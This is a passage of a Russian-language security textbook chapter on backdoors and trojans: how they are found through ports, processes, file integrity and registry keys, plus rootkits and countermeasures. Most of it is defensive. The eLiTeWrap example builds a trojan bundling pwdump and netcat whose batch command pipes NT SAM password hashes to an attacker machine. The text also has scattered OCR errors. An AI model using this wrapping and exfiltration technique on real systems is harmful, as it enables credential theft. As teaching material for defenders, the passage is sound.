    С системой Windows придется повозиться немного больше. Не остается ничего другого, как воспользоваться такими продуктами, как Windows Terminal Server или Independent Computing Architecture (ICA) компании Citrix (http://www.citrix.com). С помощью этих компонентов можно организовать конвейер, связывающий удаленный рабочий стол с компьютером взломщика. В отличие от системы NT4, в Windows 2000 терминальный сервер является встроенным компонентом, который входит в комплект поставки. Так что почти наверняка он окажется доступным. Чтобы определить, установлены ли на взломанном удаленном узле терминальные службы, можно воспользоваться утилитой sclist из набора NTRK. После этого с помощью привилегированной учетной записи нужно установить соединение. Ниже показан пример использования утилиты sciist (для краткости полученный листинг сокращен).

    D:\Toclbox>sclist athena
    - Service list for ath'ena
    running Alerter Alerter
    running TermService Terminal Services
    running TerrriServLicensing Terminal Services Licensing
    stopped TFTFD Trivial FTP Daemon
    stopped TlntSvr Telnet

    Если оказалось, что на удаленном узле установлены также средства Terminal Services Licensing, то его можно настроить для работы в режиме сервера приложений, а не в режиме сервера удаленного управления. Это может принести взломщику определенную выгоду (компания Microsoft советует устанавливать сервер лицензирования и терминальный сервер на разные компьютеры).

    Общие контрмеры против "потайных ходов": профилактический осмотр



    Вы познакомились с многочисленными средствами и методами, к которым прибегают взломщики для создания "потайных ходов". Как же администратор может обнаружить и нейтрализовать оставленные взломщиками следы?

    Средства автоматизации



    Как говорится, легче предотвратить, чем обезвредить. Многие современные коммерческие антивирусные программные продукты неплохо работают, автоматически сканируя систему в поисках таких программ. Зачастую они нейтрализуют опасность еще до того, как будет причинен реальный вред (например, до получения доступа к дисководу для гибких дисков или до загрузки вложения электронного сообщения). Достаточно полный перечень производителей антивирусных программ можно найти в статье Q49500 базы знаний компании Microsoft по адресу http://support.microsoft.com/support/ kb/articles/Q49/5/00.ASP.
    Недорогая программа The Cleaner, распространяемая компанией MooSoft Development, способна идентифицировать и обезвредить более тысячи различных видов программ типа "троянский конь" (во всяком случае так говорится в рекламных материалах). Для получения более подробной информации обратитесь по адресу http: //www. moosoft.com/сleaner.html.
    При выборе программы удостоверьтесь, что она способна выполнять поиск по таким важным критериям, как двоичные подписи и параметры системного реестра. Это бывает полезно, если взломщики-тугодумы не догадались внести соответствующие изменения и скрыть свое присутствие. Нужно помнить также о том, что антивирусные программы окажутся эффективными только в том случае, если их базы данных постоянно обновляются!

    Ведение учета



    Предположим, что все принятые меры предосторожности не помогли и система все же оказалась взломанной. В такой ситуации единственным оружием против почти всех описанных ранее приемов создания "потайных ходов" является бдительность. Со стороны администратора было бы разумным вести всесторонний учет состояния системы и продумать, где можно быстро разместить надежные данные для восстановления системы. Мы настоятельно рекомендуем выполнять инвентаризацию наиболее важных систем, регистрируя данные как о начальной установке, так и о каждом их обновлении.
    Отслеживание состояния системы в быстро меняющихся условиях, особенно на персональных рабочих станциях, может оказаться довольно утомительным занятием. А вот на относительно статичных рабочих серверах подобный учет может стать полезным подспорьем в процессе проверки целостности узла, который, вероятно, подвергся нападению. Упростить эту задачу помогают инструменты отображения состояния системы, которые будут рассматриваться ниже в этой главе. В оставшейся части данного раздела обсуждаются методы отслеживания изменений системы "вручную", которые не требуют дополнительных затрат (многие из них доступны в большинстве систем). Если еше до вторжения последовать простым рекомендациям, приведенным ниже, то после взлома будет гораздо легче понять, что же произошло. Многие из этих методов полезно применить и после нападения, в качестве следственного эксперимента.

    Кто прослушивает порты



    Возможно, это очевидно, но никогда не стоит недооценивать мощь утилиты netstat. которая позволяет выявить факт прослушивания портов программами, которые аналогичны рассмотренным выше. Следующий пример демонстрирует полезность этого инструмента (для краткости приводится не весь листинг).

    D:\Toolbox>netstat-an
    Active Connections
    Proto Local Address Foreign Address State
    TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
    TCP 0.0.0.0:54320 0.0.0.0:0 LISTENING
    TCP 192.168.234.36:139 0.0.0.0:0 LISTENING
    UDP 0.0.0.0:31337 *:*

    Интересно, догадается ли читатель, что в приведенном фрагменте не согласуется с изложенными выше фактами?
    Единственный недостаток программы netstat заключается в том, что она не сообщает о процессе, который прослушивает тот или иной порт. В системах Windows NT и 2000 с этой же задачей прекрасно справляется программа fport компании Foundstone, Inc.

    D:\Toolbox>fport
    fPort - Process port mapper Copyright (c) 2000, Foundstone, Inc.
    http://www.foundstone.com
    PID NAME TYPE PORT
    222 IEXPLORE UDP 1033
    224 OUTLOOK UDP 1107
    224 OUTLOOK UDP 1108
    224 OUTLOOK TCP 1105
    224 OUTLOOK UDP 1106
    224 OUTLOOK UDP 0
    245 MAPISP32 UDP 0
    266 nc TCP 2222

    Из приведенного листинга видно, что порт с номером 2222 прослушивается утилитой netcat. А при использовании программы netstat можно было бы узнать только номер прослушиваемого порта.
    Для сканирования больших сетей и поиска программ прослушивания лучше всего использовать программы-сканеры портов или сетевые средства, которые обсуждались в главе 2.
    Какой бы метод обнаружения прослушиваемых портов не использовался, его результат будет довольно трудно интерпретировать, если вы не знаете, что именно нужно найти. В табл. 14.1 приведен перечень наиболее красноречивых признаков наличия программного обеспечения удаленного управления.
    Если на каком-либо узле обнаружено прослушивание приведенных в таблице портов, то это верный признак того, что он подвергся нападению либо по злому умыслу хакера либо из-за неосторожности самого администратора. Следует проявлять бдительность также и по отношению к другим портам, которые на первый взгляд кажутся обычными. Во многих из перечисленных средств можно изменять номер прослушиваемого порта (см. таблицу). Чтобы убедиться, что доступ к этим портам из Internet ограничен, нужно использовать устройства обеспечения безопасности на границе сети.

    Удаление подозрительных процессов



    Еще одна возможность выявления "потайного хода" заключается в проверке списка процессов на наличие в нем таких исполняемых файлов, как nc, WinVNC. exe и т.д. Для этого в системе NT можно использовать утилиту pulist из набора NTRK, которая выводит все запущенные процессы, или sclist, показывающую работающие службы.

    Таблица 14.1. Номера портов, используемые программами и удаленного управления при создании "потайных ходов"

    "Потайной ход"
    Порт TCP, используемый по умолчанию
    Порт UDP, используемый по умолчанию
    Возможность использования альтернативных портов
    Remote.exe
    135-139
    135-139
    Нет
    Netcat
    Любой
    Любой
    Да
    Loki
    Не используется
    Не используется
    Не используется
    Реверсивный telnet-сеанс
    Любой
    Не используется
    Да
    Back Orifice
    Не используется
    31337
    Да
    Back Orifice 2000
    54320
    54321
    Да
    NetBus
    12345
    Не используется
    Да
    Masters Paradise
    40421,40422,40426
    Не используется
    Да
    pcAnywhere
    22,5631,5632,65301
    22, 5632
    Нет
    ReachOut
    43188
    Нет
    Нет
    Remotely Anywhere
    2000, 2001
    Нет
    Да
    Remotely
    799, 800
    800
    Да
    Possible/ControllT



    Timbuktu
    407
    407
    Нет
    VNC
    5800, 5801
    Нет
    Да
    Windows Terminal Server
    3389
    3389
    Нет
    NetMeeting Remote Desktop Control
    49608, 49609
    49608, 49609
    Нет
    Citrix ICA
    1494
    1494
    Нет

    Команды pulist и sclist просты в использовании. Их удобно применять в файлах сценариев для автоматизации процесса тестирования как на локальной системе, так и в сети. В качестве примера приведем список процессов, выводимый программой pulist.

    С:\nt\ew>pulist
    Process PID User
    Idle 0
    System 2
    smss.exe 24 NT AUTHORITYXSYSTEM
    CSRSS.EXE 32 NT AUTHORITYXSYSTEM
    WINLOGON.EXE 38 NT AUTHORITYXSYSTEM
    SERVICES.EXE 46 NT AUTHORITYXSYSTEM
    LSASS.EXE 49 NT AUTHORITYXSYSTEM
    CMD.EXE 295 TOGA\administrator
    nfrbof.exe , 265 TOGA\administrator
    UEDIT32.EXE 313 TOGA\administrator
    NTVDM.EXE 267 TOGA\administrator
    PULIST.EXE 309 TOGA\administrator
    C:XntXew>

    В следующем примере с помощью утилиты sclist был получен список работающих на удаленном узле служб.

    C:\nt\ew>sclist \\172.29.11.191
    ---------------
    - Service list for \\172.29.11.191
    ---------------
    running Alerter Alerter
    running Browser Computer Browser
    stopped ClipSrv ClipBook Server
    running DHCP DHCP Client
    running EventLog EventLog
    running LanraanServer Server
    running LanmanWorkstation Workstation
    running LicenseService License Logging Service
    stopped Schedule Schedule
    running Spooler Spooler
    stopped TapiSrv Telephony Service
    topped UPS UPS

    В системе UNIX для аналогичных целей можно использовать команду ps. В каждой версии UNIX имеются свои особенности использования этой команды. В Linux она выглядит как ps -aux, а в Solaris — ps -ef. Эти команды могут и должны быть применены при создании сценариев, служащих для получения отчета об изменениях в списке активных процессов. В число других замечательных инструментов системы UNIX, позволяющих получить соответствие между службами и запущенными процессами, входят программы Isof , которую можно применять в большинстве версий, и sockstat для FreeBSD. Вот пример результатов работы этих утилит.

    [crush] lsof -i
    COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
    syslogd 111 root 4u IPv4 Oxc5818fOO OtO UDP *:syslog
    dhcpd 183 root 7u IPv4 Oxc5818e40 OtO UDP *:bootps
    dhcpd 183 root lOu IPv4 Oxc5bc2fOO OtO ICMP *:*
    sshd 195 root 3u IPv4 Oxc58d9d80 OtO TCP *:ssh (LISTEN)
    sshd 1062 root 4u IPv4 OxcSSdaSCO OtO TCP crush:ssh-
    >192. 168.1.101:2420 (ESTABLISHED)
    Xaccel 1165 root 3u IPv4 Oxc58dad80 OtO TCP *:6000 (LISTEN)
    gnome-ses 1166 root 3u IPv4 Oxc58dab60 OtO TCP *:1043 (LISTEN)
    panel 1201 root 5u IPv4 Oxc58da940 OtO TCP *:1046 (LISTEN)
    gnome-nam 1213 root 4u IPv4 Oxc58da2eO OtO TCP *:1048 (LISTEN)
    genj.itil_ 1220 root 4u IPv4 Oxc58dbd80 OtO TCP *:1051(LISTEN)
    sshd " 1245 root 4u IPv4 Oxc58da720 OtOTCP crush:ssh-
    >192.163.I.101:2642 (ESTABLISHED)
    [crush] sockstat
    USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS
    root sshd 1245 4 tcp4 10.1.1.1.22 192.168.1.101.2642
    root genjjtil 1220 4 tcp4 *.1051 *.*
    root gnome-na 1213 4 tcp4 *.1048 *.*
    root panel 1201 5 tcp4 *.1046 *.*
    root gnome-se 1166 3 tcp4 *.1043 *.*
    root Xaccel 1165 3 tcp4 *.6000 *.*
    root sshd 1062 4 tcp4 10.1.1.1.22 192.168.1.101.2420
    root sshd 195 3 tcp4 *.22 *.*
    root dhcpd 183 7 udp4 *.67 *.+
    root syslogd 111 4 udp4 *.514 *.*

    Конечно же, поскольку большинство из рассмотренных выше программ может быть переименовано, без инвентаризации системы и приложений как при их начальной установке, так и при последующих обновлениях, "потайной ход" будет трудно обнаружить (нам кажется, что об этом говорилось уже достаточно).

    Отслеживание изменений файловой системы



    Для перегруженных работой администраторов сама мысль о регулярном обновлении полного списка файлов и каталогов может показаться безумной, поскольку это требует намного больших затрат, чем все предыдущие рекомендации. В то же время, если состояние системы изменяется не очень часто, такой учет является самым надежным методом выявления следов злоумышленников.
    В системе Novell для отслеживания изменений в размерах файлов, времени последнего обращения и других атрибутов можно воспользоваться командой ndir. В системе UNIX можно написать сценарий, содержащий команду Is -la, который будет записывать имя каждого файла и его размер. В Windows при использовании команды dir выводится время последнего изменения, время последнего обращения к файлу, а также ею размер. Для ведения каталога файлов без изменения времени доступа к ним можно порекомендовать утилиты a find, hfind и sfind компании NTObjectives. Помимо прочих достоинств, эти программы позволяют идентифицировать скрытые файлы, а также выявлять потоки данных внутри файлов. Для аудита файлов в системах NT/2000 можно использовать также встроенные возможности файловой системы NTFS. Просто щелкните правой кнопкой мыши на нужном файле или каталоге, выберите команду Security, щелкните на кнопке Auditing, и установите требуемые параметры для каждого пользователя или группы.
    В Windows 2000 появилась подсистема защиты файлов (WFP — Windows File Protection), обеспечивающая защиту системных файлов от перезаписи (к ним относится около 640 файлов из каталога %systemroot%). Интересный побочный эффект этого нововведения состоит в том, что хэш-коды SHA-1 этих важных файлов содержатся в файле каталога %systemroot%\system32\dllcache\nt5.cat. Поэтому, сравнивая эталонные хэш-коды с хэш-кодами текущих системных файлов, можно проверить их целостность. Такую проверку можно выполнить с использованием средства верификации сигнатуры файлов (File Signature Verification, sigverif.exe). Для этого щелкните на кнопке Advanced, перейдите во вкладку Logging и установите режим Append То Existing Log File, чтобы новые результаты можно было сравнивать с полученными ранее. Однако нужно иметь в виду, что в режиме. WFP сигнатура, скорее всего, не связывается с каждым отдельным файлом. Как отметил в мае 2000 года Рус Купер (Russ Cooper), подсистема защиты WFP не замечает копирования одного из "помеченных" файлов поверх другого (например, незамеченным останется копирование notepad.exe поверх wscript.exe). В процессе тестирования поверх файла wscript.exe мы скопировали файл, не являющийся системным, и утилита sigverif все равно подтвердила его целостность! Поэтому лучше пока не полагаться на эти новые средства, пока не будут разгаданы причины такого странного поведения.
    Среди средств сторонних производителей можно упомянуть программу проверки целостности файлов MDSsum. Она входит в состав пакета Textutils, который распространяется в рамках общей лицензии GNU.  Версию, скомпилированную для системы Windows, можно найти по адресу http://sourceware.cygnus.com/cygwin/. Утилита MDSsum на основе распространенного алгоритма MD5, разработанного Роном Ривестом (Ron Rivest) из лаборатории компьютерных наук Массачусетского технологического института, позволяет вычислить или проверить профильное сообщение (message digest) файла длиной 128 бит. Описание программы приведено в документе RFC 1321. В следующем примере показано, как программа MDSsum генерирует контрольную сумму файла test, txt, а затем выполняет ее проверку.

    D:\Toolbox>md5sum d:\test.txt>d:\test.md5
    D:\Toolbox>cat d:\test.md5
    efd3907b04b037774d831596f2clbl4a d:\Xtest.txt
    D:\Toolbox>md5sum --check d:\test.md5
    d:\Xtest.txt: OK

    К сожалению, программа MDSsum одновременно обрабатывает только один файл (конечно, написав сценарий, это можно исправить). В число более эффективных средств выявления вторжений в файловую систему входит старая программа Tripwire, которую можно найти по адресу http://www.tripwire.com.
    Следует упомянуть и несколько других важных утилит, предназначенных для проверки содержимого двоичных файлов. К ним относится известная программа strings, которая работает как в системе UNIX, так и в Windows, BinText Робина Кайра (Robin Keir) для Windowsи UltraEdit32 для Windows .
    И наконец, при инвентаризации файловой системы очевидным шагом является поиск легко узнаваемых исполняемых файлов, обеспечивающих "потайной ход", а также используемых ими библиотек. Поскольку большинство из этих инструментов может быть переименовано, такая процедура обычно не приносит пользы, но устранение очевидных изъянов — это уже половина успеха в битве за обеспечение безопасности сети. В табл. 14.2 приведен список наиболее важных файлов, при обнаружении которых нужно принимать меры, описанные в этой главе.

    Таблица 1 4.2. Используемые пo умолчанию имена исполняемых файлов утилит удаленногоуправления

    "Потайной ход"
    Имя файла(ов)
    Возможность переименовать
    remote (NT)
    remote . ехе
    Есть
    netcat (UNIX и NT)
    пс И пс . ехе
    Есть
    rinetd
    rinetd, rinetd.exe
    Есть
    Утилиты туннелирования пакетов 1СМР и UDP
    loki И lokid
    Есть
    Back Orifice
    [пробел] .ехе, boserve.exe, boconfig.exe
    Есть
    Back Orifice 2000
    bo2k.exe, bo2kcfg.exe, bo2kgui.exe, UMGR32 . EXE, bo_peep. dll, bo3des . dll
    Есть
    NetBus
    patch . exe, NBSvr . exe, KeyHook . dll
    Есть
    Virtual Network Computing for Windows (WinVNC)
    WinVNC . EXE, VNCHooks . DLL, И OMNITHKEAD_RT.DLL
    Нет
    Linux Rootkit (LRK)
    Irk
    Есть
    NT/2000 Rootkit
    deploy . exe и _root_ . sys
    Нет в сборке 0.31 а

    Загрузочный файл и параметры системного реестра



    Взломщикам было бы неинтересно создавать "потайной ход", если бы после обычной перезагрузки системы или после удаления администратором какой-нибудь необходимой службы, они не имели бы возможности возобновить соединение. Это можно обеспечить, поместив в основных конфигурационных файлах или в системном реестре ссылки на средства создания "потайного хода". Фактически для функционирования многих из упомянутых программ требуется наличие в системном реестре определенных параметров, что значительно облегчает их идентификацию и удаление.
    Программа Back Orifice добавляет запись в поддерево системного реестра HKEY_LOCAL_MACHINE\Software\ Microsoft\Windows\CurrentVersion\RunServices\. При установке по умолчанию в системном реестре параметру (Default) присваивается значение " .ехе" ([пробел] .ехе), являющееся принятым по умолчанию именем исполняемого файла сервера ВО, помещенного в каталог C:\windows\system. При установке пакета ВО2К исполняемый файл переименовывается в UMGR32 .ЕХЕ и в системе Win 9x копируется в каталог С: \windows\system. а в NT/2000 — в каталог С: \winnt\system32. Конечно же, взломщик может изменить эти параметры по своему усмотрению. Если какие-либо параметры системного реестра ссылаются на файл размером около 124,928 байт, то существует вероятность, что это файл ВО. Файл ВО2К имеет размер 114,688 байт. 
    Последняя версия программы NetBus добавляет несколько параметров в поддерево HKEY_LOCAL_MACHlNE\SOFTWARE\Net Solutions\NetBus Server, однако самый важ-ный ключ создается в HKEY_LOCAL_MACHlNE\Software\ Microsoft\Windows\CurrentVersionXRun. Он ссылается на исполняемый файл сервера (в более ранних версиях по умолчанию этот файл называется SysEdit, но взломщик может его изменить).
    Пакет WinVNC создает ключ HKEY_USERS\ .DEFAULT\Software\ORL\winVNC3.
    В системе UNIX опасные демоны нужно искать в различных файлах rс, а также в файле /etc/inetd.conf.

    Аудит, проверка учетных записей и ведение журналов регистрации



    Это последняя по порядку, но не по степени важности, контрмера, поскольку невозможно идентифицировать вторжение, если не активизированы средства оповещения. Убедитесь, что подключены встроенные возможности аудита. Например, в NT политику аудита можно настроить с помощью диспетчера пользователей, а в 2000 — с использованием аплета Security Policy. To же самое можно осуществить с помощью утилиты auditpol из набора NTRK. Файловая система NTFS позволяет отслеживать доступ на уровне отдельных файлов. Для этого в окне проводника Windows щелкните правой кнопкой мыши на требуемой папке или на файле, выберите команду Properties, перейдите во вкладку Security, щелкните на кнопке Auditing и настройте нужные параметры.

    Известно, что в системе NT4 ведение полного аудита приводит к снижению производительности, поэтому многие не пользовались этой возможностью. Однако тестирование Windows 2000 показало, что в этой операционной системе в режиме аудита потребление ресурсов значительно снижено и замедление ее работы неощутимо даже при использовании всех предоставляемых возможностей.

    Конечно, если журнал регистрации не просматривается регулярно, если его содержимое удаляется из-за недостатка свободного пространства на диске или из-за плохой организации, то даже самый полный аудит окажется бесполезным. Однажды мы посетили Web-узел, который был предупрежден об атаке еще за два месяца до ее реализации. И это случилось только благодаря тому, что некоторые системные администраторы старательно вели журналы регистрации. Чтобы не потерять такую важную информацию, разработайте политику регулярного архивирования журналов регистрации. Многие компании регулярно импортируют их в базы данных, чтобы облегчить процесс поиска и автоматизировать систему оповещения об опасности.
    Кроме того, внимательно следите за необъяснимыми изменениями учетных записей. Здесь могут пригодиться программы сторонних производителей, позволяющие получить "мгновенный снимок" системы. Например, программы DumpSec (ее предыдущая версия называется DumpACL), DumpReg и DumtEvt компании Somarsoft (http://www.-somarsoft.com) предоставляют практически всю нужную информацию о системах NT/2000. Запуск этих утилит выполняется из командной строки. 


    1.gif

    Изображение: 

    2.gif

    Изображение: 

    3.gif

    Изображение: 

    4.gif

    Изображение: 

    5.gif

    Изображение: 

    4. Программы типа "троянский конь"



    Программы типа "троянский конь"


    Как уже упоминалось во введении, "троянский конь" — это программа, которая для вида выполняет какие-нибудь полезные действия, однако на самом деле предназначена совсем для других (зачастую злонамеренных) действий или скрытно устанавливает коварные или разрушительные программы. Многие из рассмотренных выше средств создания "потайных ходов" могут быть помещены во внешне безобидные пакеты, так что конечные пользователи даже не смогут догадаться о том, насколько опасные программы установлены на их компьютерах. В качестве другого примера можно привести коварную программу, маскирующуюся под файл netstat. Эта программа, в отличие от настоящей утилиты netstat, намеренно не показывает некоторые прослушиваемые порты, тем самым скрывая наличие "потайного хода". Ниже вы познакомитесь еще с несколькими примерами программ типа "троянский конь", таких как FPWNCLNT. DLL и "наборы отмычек".
    Whack-A-Mole
    Популярным средством внедрения программы NetBus является игра под названием Whack-A-Mole. Сама игра представляет собой один исполняемый файл с именем whackamole.exe, который является самораспаковывающимся архивом WinZip. При установке игры Whack-A-Mole устанавливается и сервер NetBus с именем explore.exe, а в поддереве системного реестра HKLM\SOFTWARE\Microsoft\ Windows\CurrentVersion\Run создается соответствующий ключ, ссылающийся на этот исполняемый файл. После этого сервер NetBus будет запускаться при каждой загрузке системы (обратите внимание на имя explore). Все эти действия выполняются довольно незаметно и происходят после появления на экране небольшой привлекательной игры под названием Whack-A-Mole.

    BoSniffer



    Что может быть лучше, чем инфицирование какой-нибудь системы с помощью программы, предназначенной для поиска "потайных ходов"? Утилита BoSniffer, которая вроде бы призвана выявлять Back Orifice, на самом деле является замаскированной ВО. Так что соблюдайте осторожность при использовании подобных бесплатных средств... К счастью, эту программу можно удалить точно так же, как и обычный сервер ВО (см. разделы выше).

    eLiTeWrap



    Очень популярной программой типа "троянский конь" является eLiTeWrap. Она предназначена для "упаковки" многочисленных файлов в один исполняемый файл и последующей их распаковки либо запуска на удаленном узле. Как видно из следующего примера, в такую "обертку" можно поместить также сценарии, что позволяет взломщикам реализовать неповторимые атаки. 

    С:\nt\ew>elitewrap
    eLiTeWrap 1.03 - (С) Tom "eLiTe"
    Mclntyre tomSdundeecake.demon.со.uk
    http://www.dundeecake.demon.co.uk/elitewrap
    Stub size: 7712 bytes Enter name of output file: bad.exe
    Operations: 1 - Pack only
    2 - Pack and execute, visible, asynchronously
    3 - Pack and execute, hidden, asynchronously
    4 - Pack and execute, visible, synchronously
    5 - Pack and execute, hidden, synchronously
    6 - Execute only, visible, asynchronously
    7 - Execute only, hidden, asynchronously
    8 - Execute only, visible, synchronously
    9 - Execute only, hidden, synchronously
    Enter package file #1: c:\nt\pwdump.exe
    Enter operation: 1 Enter package file#2:c:\nt\nc.exe
    Enter operation: 1
    Enter package file #3: c:\nt\ew\attack.bat
    Enter operation: 7
    Enter command line:
    Enter package file #4:
    All done :)

    Теперь в распоряжении взломщика появился файл с именем bad.exe. При запуске из него будут извлечены утилиты pwdump.exe, netcat (nc.exe), а затем запустится командный файл attack.bat, в котором содержится простая команда, например pwdump i nc.exe -n 192.168.1.1 3000. В результате база данных SAM системы NT попадет на компьютер взломщика (192 .168 .1.1, на котором утилиту netcat следует настроить на прослушивание порта 3000).
    Программу eLiTeWrap можно обнаружить, если из исполняемого файла взломщик забыл удалить ее сигнатуру. Следующая команда поиска позволит найти сигнатуру в любом файле .ЕХЕ.

    С:\nt\ew>find "eLiTeWrap" bad.exe
    ---BAD.EXE
    eLiTeWrap VI.03

    Ключевое слово "eLiTeWrap" может измениться, поэтому при выявлении программы eLiTeWrap не следует полностью полагаться на этот признак.

    Библиотека FPWNCLNT . DLL для Windows NT



    Одна из тайных задач программ типа "троянский конь" состоит в их маскировке под системный компонент регистрации в системе и захвате имен/паролей пользователей. Одним из примеров реализации такого подхода является библиотека FPNWCLNT.DLL, устанавливаемая на серверы NT, на которых требуется выполнять синхронизацию паролей с системами Novell NetWare. Эта библиотека перехватывает изменения паролей перед тем, как они будут зашифрованы и записаны в базу данных SAM, что позволяет службам NetWare получить пароли в удобочитаемом виде, обеспечивая тем самым единую форму регистрации.
    В Internet был помещен код, позволяющий регистрировать факты изменения паролей и заносить сведения об этих изменениях (а не сами пароли) в файл C:\TEMP\PWDCHANGE. OUT. (Более подробную информацию и пример кода можно найти по адресу http://www.ntsecurity.net/security/passworddll.htm.) Хотя эта программа позволяет отслеживать только изменение паролей, ее легко модифицировать так, чтобы с ее помощью можно было захватывать и сами пароли в обычном текстовом формате.

    Контрмеры



    Если нет необходимости в синхронизации паролей между системами NT и NetWare, удалите файл FPNWCLNT.DLL из каталога %systemroot*\system32. Следует проверить также поддерево системного реестра HKEY_LOCAL_MACKINE\SYSTEM\CurrentControlSet\ Control\Lsa\Notificaion Packages (REG_MULTI_SZ) и удалить из него строку FPNWCLNT. Если эта динамически подключаемая библиотека все же необходима для работы в смешанной среде, сравните атрибуты используемого файла с атрибутами его проверенной копии (например, содержащейся на установочном компакт-диске) и убедитесь, что это исходная версия компании Microsoft. Если возникли какие-то сомнения, лучше восстановить данный файл с проверенного носителя.


    5. Разрушение системного окружения: "наборы отмычек" и средства создания образа состояния системы



    Разрушение системного окружения: "наборы отмычек" и средства создания образа состояния системы


    До сих пор речь шла о многочисленных способах размещения в системе скрытых ловушек, чтобы обычные пользователи даже и не догадывались о том, что же происходит на самом деле. Многие представленные концепции касались средств, работающих под видом обычных программ (несмотря на зловредность выполняемых ими действий), которые скрывались в таких местах, где их легко найти. К сожалению, взломщики способны на более зловредные поступки, в чем вы очень скоро убедитесь. Из-за того, что профессиональное знание архитектуры операционных систем в настоящее время стало нормой, полное нарушение целостности системы становится тривиальной задачей.

    "Наборы отмычек"



    Что произойдет, если под контролем взломщика окажется сам код операционной системы? Предпосылки такого подхода появились еще в те времена, когда компиляция ядра UNIX иногда выполнялась еженедельно, если система плохо была настроена или находилась на началъном этапе установки. Естественно, что наборы программ, которые вместо обычных двоичных файлов операционной системы встраивают компоненты типа "троянский конь", получили название "наборов отмычек". Такие средства обеспечивают самую большую дискредитацию взламываемого компьютера. В главе 8 были описаны "наборы отмычек", предназначенные для системы UNIX, которые обычно состоят из четырех групп инструментов, адаптированных под конкретную платформу и версию операционной системы: (1) программы типа "троянский конь", например такие, как измененные версии login, netstat и ps; (2) программы, предназначенные для создания "потайных ходов", например вставки в файл inetd; (3) программы перехвата потока данных в сети; (4) программы очистки системных журналов.
    Существует огромное множество "наборов отмычек" для системы UNIX. Для того чтобы убедиться в этом, достаточно заглянуть только на один Web-узел, находящийся по адресу http://packetstorm.security.com/UNIX/penetration/rootkits/. Еще несколько подобных наборов можно найти на этом же Web-узле по адресу /UNIX/misc. По-видимому, одним из наиболее известных является "набор отмычек" для системы Linux версии 5, в который входит несколько модифицированных версий основных утилит, включая su, ssh и несколько анализаторов сетевых пакетов.
    Чтобы не отставать, операционная система Windows NT/2000 в 1999 году тоже "обзавелась" своим собственным набором аналогичных средств. Это случилось благодаря группе хакеров Грега Хогланда (Greg Hoglund). Грег застал врасплох сообщество Windows, продемонстрировав рабочий прототип таких инструментов, который способен выполнять сокрытие параметров системного реестра и "подмену" исполняемых файлов. Этот набор можно использовать в исполняемых файлах типа "троянский конь" без изменения их содержимого. Все эти трюки основываются на использовании перехвата функций (function hooking). Таким образом можно "модифицировать" ядро NT, в результате чего будут захвачены системные вызовы. С помощью "набора отмычек" можно скрыть процесс, параметр системного реестра или файл, а также перенаправить перехваченный вызов функциям программ типа "троянский конь". Полученный результат способен превзойти ожидания от внедрения обычных "троянских коней": пользователь не может быть уверен даже в целостности исполняемого кода.

    Контрмеры против "наборов отмычек"



    Если оказалось, что нельзя доверять даже командам Is или dir, значит, пришло время признать себя побежденным: создайте резервные копии важных данных (но только не двоичных файлов!), удалите все программное обеспечение, а затем переустановите его с проверенных носителей. Не следует особо надеяться на резервные копии, поскольку абсолютно неизвестно, когда именно взломщик пробрался в систему. После восстановления программное обеспечение также может оказаться "троянизированным".
    Важно не забывать одно из золотых правил обеспечения безопасности и восстановления после сбоев: известные состояния (known states) и повторяемость (repeatability). Производственные системы зачастую должны быть быстро переустановлены, так что хорошо документированная и достаточно автоматизированная процедура установки позволит сэкономить много времени. Наличие проверенных носителей, готовых для выполнения процедуры восстановления, также достаточно важно. Если под рукой имеется компакт-диск с полностью сконфигурированным образом Web-сервера, то выигрыш во времени окажется еще более значительным. Другим хорошим приемом является документирование процесса настройки производственного режима эксплуатации, а не промежуточного режима, поскольку в процессе построения системы или ее обслуживания могут появиться изъяны в системе защиты (появление новых совместно используемых ресурсов и т.д.). Убедитесь, что в вашем распоряжении имеется контрольный список или автоматизированный сценарий возврата в производственный режим.
    Подсчет контрольных сумм также оказывается хорошей защитой против использования "наборов отмычек", однако этот прием нужно применять к системе в исходном состоянии. Средства, подобные свободно распространяемой утилите MD5sum или программе Tripwire, которая рассматривалась выше, способны "снимать" образы файлов и уведомлять о нарушении их целостности при возникновении изменений. Перенаправление исполняемых файлов, выполняемое "набором отмычек" системы NT/2000, теоретически может нейтрализовать подсчет контрольных сумм. Однако поскольку код при этом не изменяется, но в то же время "захватывается" и передается через другую программу, то такой прецедент все же можно выявить.
    В момент написания этой книги "набор отмычек" систем NT/2000 по-прежнему оставался на стадии альфа-версии и в основном предназначался для демонстрации наиболее важных особенностей, а не для реального применения. Так что его легко обнаружить. Просто проверьте наличие файлов deploy.exe и _root_.sys. Запуск и остановку этих средств можно выполнить с помощью команды net:

    net start_root_ net stop_root_

    He упускайте из вида такие наиболее опасные компоненты "наборов отмычек", как программы-анализаторы сетевых пакетов. Эти средства перехвата данных обладают особым коварством, поскольку способны "на лету" перехватывать сетевой трафик в процессе выполнения обычных операций.
    При передаче информации по сети используйте механизмы шифрования, такие как сервер SSH (Secure Shell), протокол SSL (Secure Sockets Layer), шифрование почтовых сообщений POP (Pretty Good Privacy) или шифрование на уровне IP, которое обеспечивается при реализации виртуальных частных сетей на базе протокола IPSec (см. главу 9). Это надежные средства защиты от атак, направленных на перехват пакетов. Использование сетей с коммутируемой архитектурой и виртуальных локальных сетей может значительно снизить риск взлома, однако при использовании таких средств, как утилита dsniff, нельзя предоставить никаких гарантий, (см. главу 8).

    Создание образа системного окружения для нейтрализации механизма проверки контрольных сумм



    Существует несколько средств для создания зеркального образа системных томов (табл. 14.3). Эти мощные утилиты помогают сэкономить время и при возникновении внештатной ситуации могут оказаться просто незаменимыми. Однако их побитовая точность фиксирования состояния системы может быть использована для того, чтобы обвести вокруг пальца механизмы обеспечения безопасности, основанные на проверке контрольных сумм текущих системных данных.
    Очевидно, что для осуществления подобной атаки требуется высокий уровень доступа к целевой системе, поскольку все перечисленные в табл. 14.3 процедуры требуют перезапуска системы или физического удаления жесткого диска. Впрочем, если взломщик получит этот вид доступа, то с уверенностью можно сказать, что он сможет отвести душу по-настоящему (читателям, которым в это не верится, стоит еще раз перечитать раздел о "наборах отмычек"). Подумайте о практическом применении приложений, основанных на использовании такой системной информации, как содержимое списка процессов, данных о загрузке центрального процессора и т.д. На основе этих данных генерируются контрольные суммы, применяемые в дальнейшем при санкционировании некоторых видов транзакций.

    Таблица 14.3. Некоторые технологии копирования состояния системы и связанные с ними программные продукты

    Технология
    Программный продукт
    Адрес URL
    Дублирование жестких дисков
    Image MASSter OmniClone line
    http://www.ics-iq.com 
